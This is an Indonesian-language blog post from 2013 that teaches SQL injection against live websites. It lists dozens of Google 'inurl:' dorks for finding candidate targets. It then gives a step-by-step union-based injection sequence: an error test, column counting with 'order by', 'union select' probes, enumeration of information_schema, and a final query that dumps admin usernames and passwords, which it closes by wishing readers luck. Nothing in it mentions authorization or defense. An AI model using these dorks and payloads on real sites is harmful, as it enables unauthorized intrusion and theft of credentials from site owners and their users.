Sabtu, 15 Juni 2013

0 SQL Injection

Date: Sabtu, 15 Juni 2013 08.18
Category:
Author: Unknown
Share:
Responds: 0 Comment
untuk para master2 jangan di ketawain nich artikel cupu dari dopunk.
sekarang saya mau membagi sedikit apa itu sql Injection??temen-temen pastinya dah sering dengar istilah ini,istilah ini sangat merakyat di kalangan dunia perkomputeran.apa sich SQL?SQL yaitu Structure Query Language yg maksudnya adalah suatu bahasa pemorgraman yang berfungsi untuk menyimpan data-data berupa string,integer dan lain-lain.atau dengan kata kerennya yaitu database (tempat ato gudang data :D).SQL fungsinya sama dengan dbase yg lain seperti microsoft acces,oracle dll.nah untuk SQL injection sendiri adalah suatu tehnik dimana kita akan mencuri data-data penting di dalam sql.nah untuk cara-caranya sebagai berikut ,
pertama-tama pastinya kita harus mempunyai target yang mau di inject sqlnya.nah untuk mempermudah kita mencari target kita gunain mesin search engine google az.dengan bantuan keyword di bawah ini :
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?id=
inurl:play_old.php?id=
inurl:newsitem.php?id=
inurl:readnews.php?id=
inurl:top10.php?id=
inurl:historialeer.php?id=
inurl:reagir.php?id=
inurl:Stray-Questions-View.php?id=
inurl:forum_bds.php?id=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?id=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=


ketikkan keyword di atas di google (pilih salah satu)kemudian enter.
nah kemudian muncullah target-target yang akan kita buat uji coba.
kedua,setelah kalian menetapkan target,maka untuk langkah selanjutnya melakukan test pada target tsb apa ada bug (error or kesalahan) dalam sqlnya.gimana caranya?caranya dengan menggunakan tanda singgle quote (') atau tanda petik satu.jadi hasilnya kaya gini kurang lebih :
htttp://target.com/products.php?id=1'

ketiga,jika dengan pentest tsb keluar pesan error di target.maka target tsb bisa kita inject sqlnya atao bahasa kerennya target itu vuln (mode on : so tau).maka untuk langkah selanjutnya kita akan mengecek berapa banyak kolom yg terdapat dalam sql tsb,dengan menggunakan perintah "order by" seperti contoh berikut :
http://target.com/products.php?id=-1 order by 1

kita cek kolomna dengan mengubah angka di belakang order by.sampe di target mengeluarkan pesan error lagi,contoh:
http://target.com/products.php?id=-1
order by 5

nah di saat pada angka 5 udah ada pesan error makan kita berhenti di situ.

keempat,setelah kita mengetahui berapa banyak kolom yg ada di sql tsb,waktunya kita melihat kolom berapa az yg ada isinya,dengan menggunakan perintah "union select".contoh:
http://target.com/products.php?id=-1 union select 1,2,3,4,5


kelima,jika di target mengeluarkan angka,misal keluar angka 2,kita coba liat isinya di angka 2.pertama kita liat versinya dulu ya,kalo versi 4 maka kita bahas di tahap selanjutnya ato kalian googling sendiri ya :D.untuk cara melihat versi berapakah sql yg di pake di target maka kita gunakan perintah "version()".contoh :
http://target.com/products.php?id=-1 union select 1,version(),3,4,5


keenam,nah setelah mengetahui versi sql kita lanjut melihat isinya,gimana caranya?caranya yaitu dengan menggunakan "group_concat(table_name)" dan di angka paling akhir kita kasih embel2 "from information_schema.tables".contoh :
http://target.com/products.php?id=-1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables

setelah information isi dari kolom 2 keluar,maka waktunya kita memilih dari isi itu yg begitu penting.

ketujuh,setelah menetapkan memilih salah satu isi,maka langkah selanjutnya kita mengkonversi string tsb menjadi hexa.misal kita memilih "admin" maka kita konversi ascii "admin" ke hexa sehingga menjadi 61646D696E.

kedelapan,langkah selanjutnya kita masuk lebih dalem,yaitu kitamelihat isi dari admin.dengan perintah "group_concat(column_name" dan di belakang angka terakhir di kasih embel2 "from informaion_schema.columns where table_name=0x61646D696E".jadi sehingga menjadi kaya gini kurang lebih :
http://target.com/products.php?id=-1 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x61646D696E


kesembilan,setelah hasil itu keluar maka langkah terakhir yaitu melihat lagi lebih dalem isi dari admin.misal dari hasil di atas keluar id,username,pass.maka kita keluarin isi dari hasil ketiga tersebut.

terakhir,cara ngeluarin ato mau isi lihat dari id,username,pass maka kita guanakan perintah : "group_concat(id,0x3a,username,0x3a,pass)" di belakang angka terakhir kasih perintah "from admin"
jadi seperti ini kurang lebih :
http://target.com/products.php?id=-1 union select 1,group_concat(id,0x3a,username,0x3a,pass),3,4,5 from admin


nah dengan perintah di atas kita sudah mendapatkan user dan pass suatu target.gampang kan??

selamat mencoba az ya..

semoga berguna
thenk's

Artikel Terkait :



Posting Komentar